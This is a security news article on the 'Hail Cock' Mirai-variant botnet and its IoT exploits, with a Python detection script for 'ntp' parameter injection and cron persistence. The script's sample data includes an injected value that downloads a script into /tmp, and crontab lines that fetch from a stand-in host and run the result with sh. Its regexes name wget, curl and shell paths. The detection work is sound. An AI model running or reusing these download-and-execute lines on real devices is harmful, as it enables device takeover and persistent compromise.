Hail Cock Botnet: A Mirai Variant Exploiting Vulnerabilities in IoT Devices


2024-12-26


The internet of things (IoT) has revolutionized the way we interact with our surroundings. However, the convenience of these devices often comes at the cost of security. This article explores a recent campaign by the “Hail Cock Botnet” that exploits vulnerabilities in DigiEver DS-2105 Pro NVRs and other IoT devices.

Researchers at Akamai have discovered a new botnet called “Hail Cock Botnet” that leverages a Mirai variant to target vulnerabilities in various IoT devices. This Mirai variant utilizes enhanced encryption algorithms, including ChaCha20 and XOR, to make detection more challenging.

The botnet primarily targets DigiEver DS-2105 Pro NVRs through a remote code execution (RCE) vulnerability. It can also exploit flaws in TP-Link devices (CVE-2023-1389) and Teltonika RUT9XX routers (CVE-2018-17532).

Upon successful exploitation, the attacker injects commands via the “ntp” parameter and downloads Mirai-based malware through HTTP POST requests. The malware establishes persistence with cron jobs that download a shell script from a malicious domain, and it brute-forces credentials to compromise additional devices.

The researchers emphasize the importance of keeping IoT devices updated with the latest firmware to mitigate such attacks. Since outdated devices, like the DigiEver DS-2105 Pro, might not receive security patches, upgrading to a newer model is recommended when updates are unavailable.

What Undercode Says:

The emergence of the Hail Cock Botnet highlights the evolving threat landscape of IoT security. Here are some key takeaways from this incident:

Evolving Mirai Variants: This campaign demonstrates the continuous development of Mirai botnets. The incorporation of stronger encryption algorithms makes detection more challenging for security solutions.
Focus on Outdated Devices: Attackers often target vulnerabilities in outdated devices, especially those no longer supported by manufacturers. This emphasizes the need for proper lifecycle management of IoT devices.
Importance of Patch Management: Regularly updating firmware is crucial for maintaining the security of IoT devices. However, for devices nearing end-of-life, upgrading to a newer model might be the only viable solution.
Detection and Prevention: Security professionals should leverage IoCs (Indicators of Compromise) and Yara rules provided by Akamai to detect and prevent Hail Cock Botnet infections.
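The attack chain described above (command injection through the “ntp” form parameter, then a cron job that fetches a shell script over HTTP) can be turned into two simple host- and web-side checks. The following script is an added example written for this article; it is not Akamai's code, not the article's, and not the published Yara rules. The CGI path, the example.invalid domain, the request records and the crontab text are all constructed sample data; real deployments would feed it captured POST bodies from a reverse proxy or IDS and the NVR's actual crontab.

```python
"""Detect two behaviours from the Hail Cock write-up on sample data:
1. an 'ntp' form field carrying shell syntax instead of a hostname, and
2. a crontab entry that downloads over HTTP(S) and executes the result.
Added example; all inputs below are constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs

# A legitimate NTP-server field holds a hostname or IP. Shell separators,
# command substitution and download tooling have no place in it.
NTP_INJECTION = re.compile(
    r"[;&|`]|\$\(|\b(?:wget|curl|tftp)\b|/bin/sh|/tmp/|chmod\s+\+?x",
    re.IGNORECASE,
)

# Cron lines that fetch a URL and pipe/chain it into a shell, or drop the
# download into /tmp (the persistence pattern the article describes).
CRON_DOWNLOAD_EXEC = re.compile(
    r"(?:wget|curl)\b[^\n]*https?://[^\n]*"
    r"(?:\|\s*(?:sh|bash)\b|;\s*(?:sh|bash)\b|-O\s*/tmp/)",
    re.IGNORECASE,
)


def injected_ntp_value(body):
    """Return the 'ntp' value if it carries shell syntax, else None.

    body is a URL-encoded form body; parse_qs decodes %XX and '+' for us,
    so an encoded ';' is seen the same way the target CGI would see it.
    """
    for value in parse_qs(body, keep_blank_values=True).get("ntp", []):
        if NTP_INJECTION.search(value):
            return value
    return None


def scan_requests(records):
    """records: iterable of (method, path, body) tuples.

    Returns a list of (path, offending_ntp_value) for POSTs whose 'ntp'
    parameter looks like command injection.
    """
    hits = []
    for method, path, body in records:
        if method.upper() != "POST":
            continue
        bad = injected_ntp_value(body)
        if bad is not None:
            hits.append((path, bad))
    return hits


def scan_crontab(text):
    """Return crontab lines (comments skipped) that download and execute."""
    return [
        line
        for line in text.splitlines()
        if not line.lstrip().startswith("#") and CRON_DOWNLOAD_EXEC.search(line)
    ]


# Constructed sample data. The CGI path is a placeholder, not the device's
# real endpoint, and example.invalid is a reserved, non-resolving domain.
SAMPLE_REQUESTS = [
    ("POST", "/cgi-bin/example.cgi", "action=save&ntp=pool.ntp.org"),
    (
        "POST",
        "/cgi-bin/example.cgi",
        "action=save&ntp=pool.ntp.org%3Bwget+http%3A%2F%2Fexample.invalid"
        "%2Fx.sh+-O+%2Ftmp%2Fx.sh",
    ),
    ("GET", "/index.html", ""),
]

SAMPLE_CRONTAB = """\
# constructed crontab for the example
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q http://example.invalid/update.sh -O /tmp/update.sh; sh /tmp/update.sh
*/10 * * * * curl -s https://example.invalid/a | sh
"""

if __name__ == "__main__":
    for path, value in scan_requests(SAMPLE_REQUESTS):
        print(f"suspicious ntp parameter on {path}: {value!r}")
    for line in scan_crontab(SAMPLE_CRONTAB):
        print(f"suspicious cron entry: {line}")
```

Both checks are deliberately narrow so they stay low-noise on an NVR: the request check only fires on the one field the article names, and the cron check only on fetch-and-execute patterns, not on every scheduled job. Treat a hit from either as a trigger for the published IoCs and Yara rules rather than as proof of infection on its own.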

In conclusion, the Hail Cock Botnet incident serves as a stark reminder of the critical need for robust security practices in the IoT domain. By implementing a layered security approach that includes regular firmware updates, end-of-life device management, and advanced threat detection solutions, organizations can significantly reduce the risk of IoT-based attacks.

References:

Reported By: Securityaffairs.com